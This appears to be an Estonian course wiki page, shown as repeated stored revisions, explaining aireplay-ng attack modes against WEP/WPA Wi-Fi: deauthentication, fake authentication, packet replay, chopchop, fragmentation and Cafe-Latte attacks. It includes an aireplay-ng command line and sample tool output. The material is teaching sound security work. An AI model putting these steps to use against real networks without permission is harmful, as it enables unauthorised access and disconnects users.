Et seda teha, tuleb meil kas taasmängida originaalpaketti, või paketti veidi manipuleerida. AP'd edastavad(tekitavad uue IV) alati pakkidele mis on suunatud broadcast MACi(FF:FF:FF:FF:FF:FF) vastu. Selline omadus on näiteks ARP pakettidel. Peale selle on vajalik et pakett liiguks traadita kliendist traadiga võrku. Sellisel pakettil on "To DS" lipuke seatud "1" peale.
Need filtrid on seadistatavad -b,-d ja -t argumentidega.[8]

===Manipuleeritavad pakid===

Eesmärk, nagu alati, on panna AP genereerima uusi IV'sid. Ainuke vajalik argument on "-t 1" - see selekteerib ainult pakette mis liiguvad etherneti suunas.

Me ei hooli ka mis lõppunkti MAC aadress on, kuna me saame selle ära muuta. Selleks on "-p 0841" argument, mis muudab paki põhimõtte selliseks nagu ta saadetaks kliendist AP'sse - põmst. muudab "To DS" lipu "1". Vaja on anda ka "-c" väärtuseks broadcast MAC.[8]

===Klientideta võrgu ründamine===
Sellel meetodil on väga huvitav omadus see, et saab rünnata ka traadita-klientideta AP'd. Jooksuta aireplay-d kõige elementaarsemate argumentidega:
<pre>aireplay-ng -2 -b 00:14:6C:7E:40:80 -d FF:FF:FF:FF:FF:FF -t 1 ath0</pre>

Nüüd jääb üle vaid oodata kuni mõni pakett broadcasti saadetakse. Pole tähtis milline pakket, sisesta lihtsalt "y" esimesele tulevale pakile ja AP hakkab IV'sid genereerima. Negatiivne külg asjal on tõsiasi et paljud pakid on suhteliselt suured - suured pakid genereerivad IV'sid aeglasemalt. Suur pluss on see et ei ole vaja kinni püüda xor paketistriimi(chopchop või fragmenteeritud rünnakud), ehitada pakki ja käivitada relay rünnakut.[8]

==Rünnak 3: ARP request replay attack==
Klassikaline ARP päringu taasmängimise rünnak on efektiivseim viis IV'de genereerimiseks, ja ta töötab ka piisavalt stabiilselt. Programm kuulab ARP paketti(tunneb ära kindlate mittekrüptimata väljade järgi ja paki pikkuse järgi) ning hakkab seda AP'le taasmängima. See omakorda põhjustab igale päringu vastusele uue IV genereerimise.
Seda rünnakut võib lugeda interaktiivse taasmängimise erijuhuks.[9]

==Rünnak 4: KoreK chopchop attack==
See rünnak suudab hea õnne korral dekrüptida WEP paketi ilma salajast võtit teadmata. Meetod võib töötada isegi dünaamilise WEP vastu. See rünnak ei tagasta sulle WEP salajast võtit, vaid paketi sisu ja selle paketi krüptimiseks kasutatud keystreami. Mõned AP'd ei ole sellele rünnakule avatud. Kui AP dropib pakke mille pikkus on alla 42 baidi, siis aireplay üritab ülejäänud baidid ära arvata - edukuse tõenäosus oleneb headerite ennustusvõimest. Kui püütakse kinni IP pakett, siis tehakse lisaks veel checksum kontroll peale arvatava lisabaitide juurdelisamist. Rünnakuks on vaja vähemalt ühte WEP paketti.[10]

===Teooria===
KoreK võttis hästituntud nõrga ICV[link] probleemi ja järeldas sellest, et kui pakki lühendada ühe baidi võrra, siis saab sellest ehitada uue korrektse paki, kuna uus ICV on otseselt seotud puuduva krüptimata baidiga. [11]

Esimene samm on võtta püütud pakett (M) ja eemaldada viimane bait, et saada sõnum M-1. Kuna me ei tea eemaldatud baidi plaintekst väärtust, peame hakkama seda arvama. Õnneks on ainult 256 võimalikku baidiväärtust. Esmaks eeldame siis et eemaldatud bait oli 00 ja paneme saadud sõnumi valemisse(liiga mahukas et siin kirjeldada) et luu abitmask mis üritab muuta ebakorrektset M-1 paketti valiidseks M-1 paketiks. Siis proovime paki korrektsust pritsides selle võrku. Kui AP selle kätte saab, siis kontrollitakse seda ja vastavalt aksepteeritakse või rejectitakse. Iga saadetud pakk baseerub arvatava baidil, niiet tõenäosus õige olla on 1/256. Kui pakett on aga õige, siis AP valideerib selle ja edastab võrku. Eeldades et sa samal ajal kuulad võrku saad näha kui AP seda teeb. Sellisel juhul tead mis on paki viimane bait. Siis on võimalik arvutada PRGA väärtus mida kasutati selle plaintekst baidi krüptimiseks(P XOR M = RC4 PRGA). Ühesõnaga, ründaja saab bait baidi haaval kogu paketi niimoodi ära arvata, boonuseks on ka keystream millega saad oma paki luua.[11]

<pre> .........
Offset 38 (90% done) | xor = FD | pt = 08 | 229 frames written in 688ms
Offset 37 (92% done) | xor = 13 | pt = 01 | 232 frames written in 695ms
Offset 36 (94% done) | xor = 83 | pt = 00 | 19 frames written in 58ms
Offset 35 (96% done) | xor = 4E | pt = 06 | 230 frames written in 689ms
Sent 957 packets, current guess: B9...

The AP appears to drop packets shorter than 35 bytes.
Enabling standard workaround: ARP header re-creation.

Saving plaintext in replay_dec-0201-191706.cap
Saving keystream in replay_dec-0201-191706.xor

Completed in 21s (2.29 bytes/s)</pre>
Jee! Saad kasutada xor faili oma paki injectimiseks või lugeda paki sisu .cap failist. Vaata ainult et paki injectimisel kasutad autentitud source maci, väga väheste ruuterite korral töötab paki sisestamine broadcasti ilma autentimata. Soovitatav on võtta ka lühem pakett kuna deükrptimise aeg on lineaarselt seotud paketi pikkusega.[10]

==Rünnak 5: Fragmentation attack==
Õnnestumise korral suudab see rünnak tagastada sulle kuni 1500 baiti PRGA'd. See rünnak ei tagasta WEP võtit. Saadud PRGA'ga saab krüptida oma loodud pakette ja neid võrku injectida. Ründamiseks on vaja saada AP'lt vähemalt üks pakett.[12]

Põhimõtteliselt saab proigramm paketist väikese hulga võtmematerjali ning üritab saata ARP või LLC pakette(sisu on teada) AP'le. Kui pakett kajatakse tagasi AP poolt siis saab tagstatud paketi põhjal tuletada suurema hulga PRGA baite. Tsüklit saab korrata kuni saadakse kätte kuni 1500 baiti.[12]

See rünnak nõuab head ühendust AP'ga, kuna ründaja fragmenteerib pakette ja AP peab need kõik kätte saama.[12]

<pre>
Saving chosen packet in replay_src-0124-161120.cap
Data packet found!
Sending fragmented packet
Got RELAYED packet!!
Thats our ARP packet!
Trying to get 384 bytes of a keystream
Got RELAYED packet!!
Thats our ARP packet!
Trying to get 1500 bytes of a keystream
Got RELAYED packet!!
Thats our ARP packet!
Saving keystream in fragment-0124-161129.xor
Now you can build a packet with packetforge-ng out of that 1500 bytes keystream
</pre>
Ja meil ongi olemas .xor fail millega saab custom pakette injectida. Muidugi on vajalik assotsitud klienti kelle nimelt pakette injectida.[12]

==Rünnak 6: Cafe-latte attack==
Iga WEP klient kes saab ARP päringu vastab sellele automaatselt korrektselt krüptitud ARP vastustega - AP ei pea selles etapis tõestama et ta WEP võtit teab.
Selle rünnakuga saab kinnipüütud paketis pöörata ümber mõned bitid mille käigus pööratakse kliendi ARP päring ta enda poole tagasi. Saates võltsitud ARP päringut kliendile korduvalt saame kinni püüda suurel hulgal korrektseid krüptitud ARP vastuseid.[13]

See rünnak töötab kuna WEP ei ole nõrk mitte ainult statistilise analüüsi rünnakute vastu, vaid tal puudub ka krüptograafilise tugevusega paki integrity kontroll.
Lühidalt öeldes ei suuda osapooled eristada võltsitud/modifitseeritud paketti korrektsest pakist.[13]

Iga WEP pakett kasutab CRC checksumi ülekande vigade tuvastamiseks. Ammu aga teatakse et ründaja saab muuta nii paki sisu kui ka CRC'd et luua uus korrektne pakk. Cafe-latte kasutab neid nõrkusi ja muudab ära saatja MACi ja saatja IP aadressi mis sisalduvad kliendi ARP päringus ning suunavad need kliendi vastu.[13]

Kuna klient ei suuda võltsingut eristada, vastabki ka igale päringule.[13]

===Kasutamine===
Seda rünnakut saab kasutada reaalsest võrgust eraldatud kliendi puhul. Kliendid teevad tuntud võrkude otsimisel PROBE päringuid, millele saab ründaja siis fake APga vastata. Sellisel juhul peaks kasutama "-D" argumenti et lülitada välja AP otsimine.[14]

==Rünnak 7: Client-oriented fragmentation attack==
Selle rünnakuga saab kasutada suvalist IP või ARP paketti. See laiendab Cafe-Latte rünnakut lubades kasutada suvalist paketti kliendilt.
Sellest paketist peame genereerima ARP päringu. ARPil peab asuma baidipositsioonil 33 target IP ja target MAC peab olema nullbaidi jada.
Praktikas võib target MAC olla aga suvaline väärtus.[15]

Saadud pakis on teada koht kus asub source IP - bait 23 ARP puhul ja 21 IP puhul. Eeldatakse et pakk on ARP kui paki suurus on 68 või 86 baiti, vastaseljuhul eeldatakse et on IP pakett.[15]

Valiidse ARP päringu saatmiseks kliendile peame liigutama source IP positsioonile 33. Muidugi ei saa seda niisama lihtsalt teha - pakk ei valideeruks. Selle vastu kasutame aga paketi fragmenteerimist. ARP saadetakse kliendile kahe fragmendina. Esimese fragmendi pikkus valitakse niimoodi et paketi kokkupanemisel kliendi poolt satuks incoming source IP positsioonile 33. Teine fragment on pakett mis kliendilt alguses saadi.[15]

IP Paketi puhul kasutatakse sarnast meetodit. Aga kuna PRGA materjali on vähem, siis saadetakse välja kolm fragmenti pluss algne pakk.[15]

Igaljuhul kasutatakse CRC korrektsuse säilitamiseks bit-flippingut. Sama meetodit kasutatakse ka ARP paketi source MAC'i muutmiseks juhul kui seal on algselt multicast.[15]

=Viited=
[1] http://www.aircrack-ng.org/doku.php?id=aireplay-ng

[2] http://www.aircrack-ng.org/doku.php?id=deauthentication

[3] http://www.aircrack-ng.org/doku.php?id=fake_authentication

[4] https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy

[5] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-08.html

[6] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-09.html

[7] http://www.aircrack-ng.org/doku.php?id=shared_key

[8] http://www.aircrack-ng.org/doku.php?id=interactive_packet_replay

[9] http://www.aircrack-ng.org/doku.php?id=arp-request_reinjection

[10] http://www.aircrack-ng.org/doku.php?id=korek_chopchop

[11] http://www.informit.com/guides/content.aspx?g=security&seqNum=197

[12] http://www.aircrack-ng.org/doku.php?id=fragmentation

[13] http://www.wi-fiplanet.com/tutorials/article.php/10724_3716241_2

[14] http://www.aircrack-ng.org/doku.php?id=cafe-latte

[15] http://www.aircrack-ng.org/doku.php?id=hirte

\[\[Category:Traadita_side_alused]]

Aireplay-ng ründerežiimid

2011-05-10T10:19:48Z

Tliiv: /* Rünnak 0: Deauthentication */

=Sissejuhatus=

Aireplay-ng`d kasutatakse ''frame''`de sisestamiseks võrguliiklusesse.[1]

Peamine funktsioon on liikluse genereerimine hilisemaks kasutamiseks aircrack-ng`s - [https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy WEP] ja [https://secure.wikimedia.org/wikipedia/en/wiki/WPA-PSK WPA-PSK] võtmete lahtimurdmiseks. Erinevad rünnakuviisid võimaldavad tekitada deautentimist WPA ''handshake'' pakettide püüdmiseks, võlts deautentimiseks, interaktiivseks pakettide taasmängimiseks ja käsitsi valmistatud ARP päringute sisestamiseks liiklusesse.[1]

=Eelteadmised=
WEP ja WPA/WPA2 võrkude ründamiseks on vajalikud mõned konkreetsed eelteadmised. Nende teadmine lihtsustab suurel määral võimalike probleemide lahendamist ja annab paremini aimu millega tegu on ja kuidas asjad ''backendis'' töötavad - ei teki näiteks viga kus üritatakse taasmängida paketti kui ühtegi klienti pole APga assotsiaseerunud.

Samuti eeldatakse et teatakse aireplay-ng põhikäske ja argumente - nullist õppimiseks ei ole see mõeldud.

==WEP==
WEPi ründamiseks on vaja eristada Open Authentication ja Shared Key Authentication süsteemi
===Open Authentication===
[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationOpen.jpg][5]

* Klient saadab autentimis päringu AP'le.[5]
* AP autentib kliendi.[5]
** AP laseb selles etapis kõik kliendid läbi, st. mingit autentimist(sõna otseses mõttes) ei toimu[5]
* Klient assotsiaseerub AP'ga ja liitub võrguga.[5]
** Selles etapis hakkavad mõlemad osapooled andmeid saatma WEPi krüpteeringuga, st. edasiseks suhtlemiseks on vaja teada salajast võtit. Sellesse punkti jõudes on võimalik assotsiaseerunud kliendi MACiga saata AP'le pakette(nõrkus).[5]

===Shared Key Authentication===
[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationShared.jpg] [6]

* Klient saadab autentimise päringu AP'le.[6]
* AP saadab kliendile ''random'' baidijada(ülesanne).[6]
* Klient kasutab oma 64- või 128bitist salajast võtit ning krüptib saadud baidijada ära, ning saadab tagasi AP'le.[6]
* AP dekrüptib saadud jada ning võrdleb seda esialgu väljasaadetud stringiga, kui need ei kattu, siis saadetakse kliendile negatiivne vastus. Kui kattub siis järelikult on kliendil ja AP'l sama WEP võti, ning AP autentib kliendi ära.[6]
* Klient ühendub võrku.[6]

Sellisel juhul ei ole võimalik autentimisest edasi saada ilma võtmeta, ning seega ei saa ka AP'le pakke võrku sisestada. (Lahendus probleemile on #Shared Key Authentication artikli all)

=Meetodid=
Meetodite pealkrijade ees on "Rünnak x:". x tähistab numbrit mitmes implementeeritud rünnak see on ja seda numbrit aksepteerib aireplay-ng ka vastava käsurea lipu argumendina.
==Rünnak 0: Deauthentication==

See meetod saab disassotsiaseerumise paketi ühele või rohkemale kliendile kes on parasjagu vastava ''access pointiga'' assotsiaseerunud. Klientide lahtiühendamisel võib olla mitu eesmärki:[2]

* Peidetud ESSID kättesaamine. See on ESSID mida access point ei kuuluta ''broadcastis''.[2]
* WPA/WPA2 handshake kinnipüüdmine sundides klienti uuesti autentima.(Ei ole kohustuslik, võib oodata ka kuni klient ise uuesti ühendub)[2]
* ARP päringute genereerimine(Windowsi kliendid võivad mõnikord oma ARP ''cache'' tühjendada kui ühendus ära kaob)[2]

NB! Arusaadavalt on see rünnak täiesti kasutu kui traadita ühenduspunkti küljes ei ole ühtegi reaalset assotsiaseerunud klienti või võlts autentitud klienti.[2]

===Meetodid===

====Suunatud====
<pre>Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9
12:35:25 Sending 64 directed DeAuth. STMAC: [00:0F:B5:AE:CE:9D] [ 61|63 ACKs]</pre>

* BSSID peab olema sihtmärk AP korrektne MAC aadress[2]
* kanal peab olema sama millel AP reaalselt räägib[2]
* STMAC on rünnatava kliendi korrektne MAC aadress[2]

* '''Sending 64 directed''' - saadeti välja 64 suunatud deautentimise paketti, st. 64 kliendile ja 64 AP'le.[2]
* '''61''' - mitu paketti klient kätte sai[2]
* '''63''' - mitu paketti AP kätte sai[2]

Kui 61 ja 63 on arvud mis on suhteliselt stabiilsed ja lähedal 64'le, siis tähendab see seda et mõlemad osapooled on sinu võrgukaardi antennist kuuldekaugusel ja nendega on võimalik infot vahetada. Kui üks neist numbritest on väike, siis tähendab seda et asud vastavast osapoolest liiga kaugel - sellisel juhul see rünnak ei tööta, sul on vaja kas saatja saatevõimet suurendada, või minna osapoolele füüsiliselt lähemale.[2]

Suunatud ''versus'' broadcast olukorras on alati soovitav kasutada suunatud varianti, kuna paljud kliendid ignoreerivad broadcastis saadetud lahtiühendamise paketti.[2]

Kui sulle kliendi ACK'ide arv tundub korrektne, aga sulle ikkagi ei tundu et ta ennast lahti ühendaks, siis võib probleem peituda selles et ta ühendub uuesti liiga kiiresti.[2]

====Broadcast====
<pre>Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
15:49:32 Sending DeAuth to broadcast -- BSSID: [00:14:6C:7E:40:80]</pre>

Nagu mainitud, ''broadcast'' lahtiühendamine on vähem efektiivsem.

==Rünnak 1: Fake authentication==
Võlts autentimine lubab läbi viia nii Open System kui ka Shared key WEP autentimist, peale selle teeb ta ka assotsiatsiooni access pointiga. See on kasulik ainult siis kui sul on vaja AP'le pakettide saatmiseks assotsiaseeritud klienti, selle puudumisel ei võta AP ühtegi talle saadetud pakki vastu. Kui meil on aga reaalne klient, siis saame tema nimel pakke saata, kui pole, on vaja võlts autentimist.
Võlts autentimine ei tekita ARP pakette(seega ei piisa selle üksi kasutamisest) ja ei suuda assotsiaseeruda WPA/WPA2 access pointidega.[3]

Fake authenticationit ei tohi kasutada aktiivse kliendi MACiga, kuna see ajab ruuteri segadusse(?). See on eriti sobilik meetod selliseks juhuks kui olemasolevalt kliendilt on kinni püütud näiteks ARP pakett, ning klient ühendub lahti enne kui suudad piisavalt arp pakette tagasi mängida. Sellisel juhul aitab sama kliendi MACiga fake autentimine ning siis seda kinnipüütud pakki uuesti/edasi mängida.

===Meetodid===
====Open Authentication====
Open authentication puhul ei üritata klienti enne assotsiamist autentida, seega saame kerge vaevaga ennast ära assotsida ning hakata AP'ga suhtlema. Selles etapis hakkavad tavakliendid WEP'i(ja seega ka salajast võtit) kasutades rääkima, meie aga saame sisestada juba korrektse võtmega krüptitud(reaalselt kliendilt varem püütud) pakke AP'le saatma, uuesti ja uuesti.[4]
<pre>18:18:20 Sending Authentication Request
18:18:20 Authentication successful
18:18:20 Sending Association Request
18:18:20 Association successful :-)</pre>
Sellisel juhul on assotsiaseerumine õnnestunud ja võib jätkata teiste rünnakutega - AP võtab vastu vastavalt MACilt tulevaid pakke, ja saadab õigetes tingimustes ka vastuseid.[4]

====Shared Key Authentication====
SKA tähendab seda, et AP ei räägi potensiaalse kliendiga mitte midagi, va. WEP võtmega autentimise protokoll, seega ei ole võimalik meil AP'ga assotsiaseeruda(me ei tea ju salajast võtit millega AP saadetud puzzle ära "lahendada") ning sellest tulenevalt ei saa me ka AP'le mingeid pakke saata.(?)
<pre>15:46:53 Sending Authentication Request
15:46:53 AP rejects open-system authentication
Please specify a PRGA-file (-y).</pre>

Sellisel juhul on vaja kinni püüda SKA handshake paketid. See toimub automaatselt kui airodump-ng näeb mõnda WEP-SKA handshake'i. Deauthentimise rünnakuga saab seda olemasolevale kliendile sundida.[7]

Kinnipüütud handshake'id salvestatakse "sharedkey-01-00-14-6C-7E-40-80.xor" formaadis faili. See fail tuleb vastavasse AP'sse fake autentimisel/kliendi disconnectimisks anda kaasa "-y" käsurea argumendiga.[7]

NOTE: Kui airodump-ng jookseb ilma aktiivseid rünnakuid AP pihta tegemata, siis on AUTH väli WEP AP taga tühi. Kui airodump-ng näeb mända handshake'i siis tuleb AUTH välja sisse SKA, samal hetkel salvestatakse ka fail.[7]

==Rünnak 2: Interactive packet replay==

See rünnak lubab valida konkreetse paketti mida taasmängida. Selle meetodiga saab pakette lugeda kahest kohast, võrgust ja failist. Keskendume võrgust püüdmisele.
Et interaktiivne uuestimängimine töötaks on tähtis veidi alusteadmisi paketivoo kohta. Iga pakett ei tööta selle rünnakuga. Õnnestumine tähendab seda et AP võtab paki vastu ja genereerib uue IV - WEP ründamiseks on vaja ju koguda palju IV'sid.
Väga kasulik on panna peale ka "-m 68 -n 86" filtrid. Need filtreerivad vastavalt minimaalse paki suuruse(68- traadita klientilt) ja maksimaalse(86- traadiga kliendilt). Need on WEP ühenduses ARP pakettide suurused ning õigesti kasutades peaksid tagama vastuse AP poolt.[8]

===Naturaalsed paketid===

Et seda teha, tuleb meil kas taasmängida originaalpaketti, või paketti veidi manipuleerida. AP'd edastavad(tekitavad uue IV) alati pakkidele mis on suunatud broadcast MACi(FF:FF:FF:FF:FF:FF) vastu. Selline omadus on näiteks ARP pakettidel. Peale selle on vajalik et pakett liiguks traadita kliendist traadiga võrku. Sellisel pakettil on "To DS" lipuke seatud "1" peale.
Need filtrid on seadistatavad -b,-d ja -t argumentidega.[8]

===Manipuleeritavad pakid===

Eesmärk, nagu alati, on panna AP genereerima uusi IV'sid. Ainuke vajalik argument on "-t 1" - see selekteerib ainult pakette mis liiguvad etherneti suunas.

Me ei hooli ka mis lõppunkti MAC aadress on, kuna me saame selle ära muuta. Selleks on "-p 0841" argument, mis muudab paki põhimõtte selliseks nagu ta saadetaks kliendist AP'sse - põmst. muudab "To DS" lipu "1". Vaja on anda ka "-c" väärtuseks broadcast MAC.[8]

===Klientideta võrgu ründamine===
Sellel meetodil on väga huvitav omadus see, et saab rünnata ka traadita-klientideta AP'd. Jooksuta aireplay-d kõige elementaarsemate argumentidega:
<pre>aireplay-ng -2 -b 00:14:6C:7E:40:80 -d FF:FF:FF:FF:FF:FF -t 1 ath0</pre>

Nüüd jääb üle vaid oodata kuni mõni pakett broadcasti saadetakse. Pole tähtis milline pakket, sisesta lihtsalt "y" esimesele tulevale pakile ja AP hakkab IV'sid genereerima. Negatiivne külg asjal on tõsiasi et paljud pakid on suhteliselt suured - suured pakid genereerivad IV'sid aeglasemalt. Suur pluss on see et ei ole vaja kinni püüda xor paketistriimi(chopchop või fragmenteeritud rünnakud), ehitada pakki ja käivitada relay rünnakut.[8]

==Rünnak 3: ARP request replay attack==
Klassikaline ARP päringu taasmängimise rünnak on efektiivseim viis IV'de genereerimiseks, ja ta töötab ka piisavalt stabiilselt. Programm kuulab ARP paketti(tunneb ära kindlate mittekrüptimata väljade järgi ja paki pikkuse järgi) ning hakkab seda AP'le taasmängima. See omakorda põhjustab igale päringu vastusele uue IV genereerimise.
Seda rünnakut võib lugeda interaktiivse taasmängimise erijuhuks.[9]

==Rünnak 4: KoreK chopchop attack==
See rünnak suudab hea õnne korral dekrüptida WEP paketi ilma salajast võtit teadmata. Meetod võib töötada isegi dünaamilise WEP vastu. See rünnak ei tagasta sulle WEP salajast võtit, vaid paketi sisu ja selle paketi krüptimiseks kasutatud keystreami. Mõned AP'd ei ole sellele rünnakule avatud. Kui AP dropib pakke mille pikkus on alla 42 baidi, siis aireplay üritab ülejäänud baidid ära arvata - edukuse tõenäosus oleneb headerite ennustusvõimest. Kui püütakse kinni IP pakett, siis tehakse lisaks veel checksum kontroll peale arvatava lisabaitide juurdelisamist. Rünnakuks on vaja vähemalt ühte WEP paketti.[10]

===Teooria===
KoreK võttis hästituntud nõrga ICV[link] probleemi ja järeldas sellest, et kui pakki lühendada ühe baidi võrra, siis saab sellest ehitada uue korrektse paki, kuna uus ICV on otseselt seotud puuduva krüptimata baidiga. [11]

Esimene samm on võtta püütud pakett (M) ja eemaldada viimane bait, et saada sõnum M-1. Kuna me ei tea eemaldatud baidi plaintekst väärtust, peame hakkama seda arvama. Õnneks on ainult 256 võimalikku baidiväärtust. Esmaks eeldame siis et eemaldatud bait oli 00 ja paneme saadud sõnumi valemisse(liiga mahukas et siin kirjeldada) et luu abitmask mis üritab muuta ebakorrektset M-1 paketti valiidseks M-1 paketiks. Siis proovime paki korrektsust pritsides selle võrku. Kui AP selle kätte saab, siis kontrollitakse seda ja vastavalt aksepteeritakse või rejectitakse. Iga saadetud pakk baseerub arvatava baidil, niiet tõenäosus õige olla on 1/256. Kui pakett on aga õige, siis AP valideerib selle ja edastab võrku. Eeldades et sa samal ajal kuulad võrku saad näha kui AP seda teeb. Sellisel juhul tead mis on paki viimane bait. Siis on võimalik arvutada PRGA väärtus mida kasutati selle plaintekst baidi krüptimiseks(P XOR M = RC4 PRGA). Ühesõnaga, ründaja saab bait baidi haaval kogu paketi niimoodi ära arvata, boonuseks on ka keystream millega saad oma paki luua.[11]

<pre> .........
Offset 38 (90% done) | xor = FD | pt = 08 | 229 frames written in 688ms
Offset 37 (92% done) | xor = 13 | pt = 01 | 232 frames written in 695ms
Offset 36 (94% done) | xor = 83 | pt = 00 | 19 frames written in 58ms
Offset 35 (96% done) | xor = 4E | pt = 06 | 230 frames written in 689ms
Sent 957 packets, current guess: B9...

The AP appears to drop packets shorter than 35 bytes.
Enabling standard workaround: ARP header re-creation.

Saving plaintext in replay_dec-0201-191706.cap
Saving keystream in replay_dec-0201-191706.xor

Completed in 21s (2.29 bytes/s)</pre>
Jee! Saad kasutada xor faili oma paki injectimiseks või lugeda paki sisu .cap failist. Vaata ainult et paki injectimisel kasutad autentitud source maci, väga väheste ruuterite korral töötab paki sisestamine broadcasti ilma autentimata. Soovitatav on võtta ka lühem pakett kuna deükrptimise aeg on lineaarselt seotud paketi pikkusega.[10]

==Rünnak 5: Fragmentation attack==
Õnnestumise korral suudab see rünnak tagastada sulle kuni 1500 baiti PRGA'd. See rünnak ei tagasta WEP võtit. Saadud PRGA'ga saab krüptida oma loodud pakette ja neid võrku injectida. Ründamiseks on vaja saada AP'lt vähemalt üks pakett.[12]

Põhimõtteliselt saab proigramm paketist väikese hulga võtmematerjali ning üritab saata ARP või LLC pakette(sisu on teada) AP'le. Kui pakett kajatakse tagasi AP poolt siis saab tagstatud paketi põhjal tuletada suurema hulga PRGA baite. Tsüklit saab korrata kuni saadakse kätte kuni 1500 baiti.[12]

See rünnak nõuab head ühendust AP'ga, kuna ründaja fragmenteerib pakette ja AP peab need kõik kätte saama.[12]

<pre>
Saving chosen packet in replay_src-0124-161120.cap
Data packet found!
Sending fragmented packet
Got RELAYED packet!!
Thats our ARP packet!
Trying to get 384 bytes of a keystream
Got RELAYED packet!!
Thats our ARP packet!
Trying to get 1500 bytes of a keystream
Got RELAYED packet!!
Thats our ARP packet!
Saving keystream in fragment-0124-161129.xor
Now you can build a packet with packetforge-ng out of that 1500 bytes keystream
</pre>
Ja meil ongi olemas .xor fail millega saab custom pakette injectida. Muidugi on vajalik assotsitud klienti kelle nimelt pakette injectida.[12]

==Rünnak 6: Cafe-latte attack==
Iga WEP klient kes saab ARP päringu vastab sellele automaatselt korrektselt krüptitud ARP vastustega - AP ei pea selles etapis tõestama et ta WEP võtit teab.
Selle rünnakuga saab kinnipüütud paketis pöörata ümber mõned bitid mille käigus pööratakse kliendi ARP päring ta enda poole tagasi. Saates võltsitud ARP päringut kliendile korduvalt saame kinni püüda suurel hulgal korrektseid krüptitud ARP vastuseid.[13]

See rünnak töötab kuna WEP ei ole nõrk mitte ainult statistilise analüüsi rünnakute vastu, vaid tal puudub ka krüptograafilise tugevusega paki integrity kontroll.
Lühidalt öeldes ei suuda osapooled eristada võltsitud/modifitseeritud paketti korrektsest pakist.[13]

Iga WEP pakett kasutab CRC checksumi ülekande vigade tuvastamiseks. Ammu aga teatakse et ründaja saab muuta nii paki sisu kui ka CRC'd et luua uus korrektne pakk. Cafe-latte kasutab neid nõrkusi ja muudab ära saatja MACi ja saatja IP aadressi mis sisalduvad kliendi ARP päringus ning suunavad need kliendi vastu.[13]

Kuna klient ei suuda võltsingut eristada, vastabki ka igale päringule.[13]

===Kasutamine===
Seda rünnakut saab kasutada reaalsest võrgust eraldatud kliendi puhul. Kliendid teevad tuntud võrkude otsimisel PROBE päringuid, millele saab ründaja siis fake APga vastata. Sellisel juhul peaks kasutama "-D" argumenti et lülitada välja AP otsimine.[14]

==Rünnak 7: Client-oriented fragmentation attack==
Selle rünnakuga saab kasutada suvalist IP või ARP paketti. See laiendab Cafe-Latte rünnakut lubades kasutada suvalist paketti kliendilt.
Sellest paketist peame genereerima ARP päringu. ARPil peab asuma baidipositsioonil 33 target IP ja target MAC peab olema nullbaidi jada.
Praktikas võib target MAC olla aga suvaline väärtus.[15]

Saadud pakis on teada koht kus asub source IP - bait 23 ARP puhul ja 21 IP puhul. Eeldatakse et pakk on ARP kui paki suurus on 68 või 86 baiti, vastaseljuhul eeldatakse et on IP pakett.[15]

Valiidse ARP päringu saatmiseks kliendile peame liigutama source IP positsioonile 33. Muidugi ei saa seda niisama lihtsalt teha - pakk ei valideeruks. Selle vastu kasutame aga paketi fragmenteerimist. ARP saadetakse kliendile kahe fragmendina. Esimese fragmendi pikkus valitakse niimoodi et paketi kokkupanemisel kliendi poolt satuks incoming source IP positsioonile 33. Teine fragment on pakett mis kliendilt alguses saadi.[15]

IP Paketi puhul kasutatakse sarnast meetodit. Aga kuna PRGA materjali on vähem, siis saadetakse välja kolm fragmenti pluss algne pakk.[15]

Igaljuhul kasutatakse CRC korrektsuse säilitamiseks bit-flippingut. Sama meetodit kasutatakse ka ARP paketi source MAC'i muutmiseks juhul kui seal on algselt multicast.[15]

=Viited=
[1] http://www.aircrack-ng.org/doku.php?id=aireplay-ng

[2] http://www.aircrack-ng.org/doku.php?id=deauthentication

[3] http://www.aircrack-ng.org/doku.php?id=fake_authentication

[4] https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy

[5] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-08.html

[6] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-09.html

[7] http://www.aircrack-ng.org/doku.php?id=shared_key

[8] http://www.aircrack-ng.org/doku.php?id=interactive_packet_replay

[9] http://www.aircrack-ng.org/doku.php?id=arp-request_reinjection

[10] http://www.aircrack-ng.org/doku.php?id=korek_chopchop

[11] http://www.informit.com/guides/content.aspx?g=security&seqNum=197

[12] http://www.aircrack-ng.org/doku.php?id=fragmentation

[13] http://www.wi-fiplanet.com/tutorials/article.php/10724_3716241_2

[14] http://www.aircrack-ng.org/doku.php?id=cafe-latte

[15] http://www.aircrack-ng.org/doku.php?id=hirte

\[\[Category:Traadita_side_alused]]

Aireplay-ng ründerežiimid

2011-05-10T10:14:20Z

Tliiv: /* Meetodid */

=Sissejuhatus=

Aireplay-ng`d kasutatakse ''frame''`de sisestamiseks võrguliiklusesse.[1]

Peamine funktsioon on liikluse genereerimine hilisemaks kasutamiseks aircrack-ng`s - [https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy WEP] ja [https://secure.wikimedia.org/wikipedia/en/wiki/WPA-PSK WPA-PSK] võtmete lahtimurdmiseks. Erinevad rünnakuviisid võimaldavad tekitada deautentimist WPA ''handshake'' pakettide püüdmiseks, võlts deautentimiseks, interaktiivseks pakettide taasmängimiseks ja käsitsi valmistatud ARP päringute sisestamiseks liiklusesse.[1]

=Eelteadmised=
WEP ja WPA/WPA2 võrkude ründamiseks on vajalikud mõned konkreetsed eelteadmised. Nende teadmine lihtsustab suurel määral võimalike probleemide lahendamist ja annab paremini aimu millega tegu on ja kuidas asjad ''backendis'' töötavad - ei teki näiteks viga kus üritatakse taasmängida paketti kui ühtegi klienti pole APga assotsiaseerunud.

Samuti eeldatakse et teatakse aireplay-ng põhikäske ja argumente - nullist õppimiseks ei ole see mõeldud.

==WEP==
WEPi ründamiseks on vaja eristada Open Authentication ja Shared Key Authentication süsteemi
===Open Authentication===
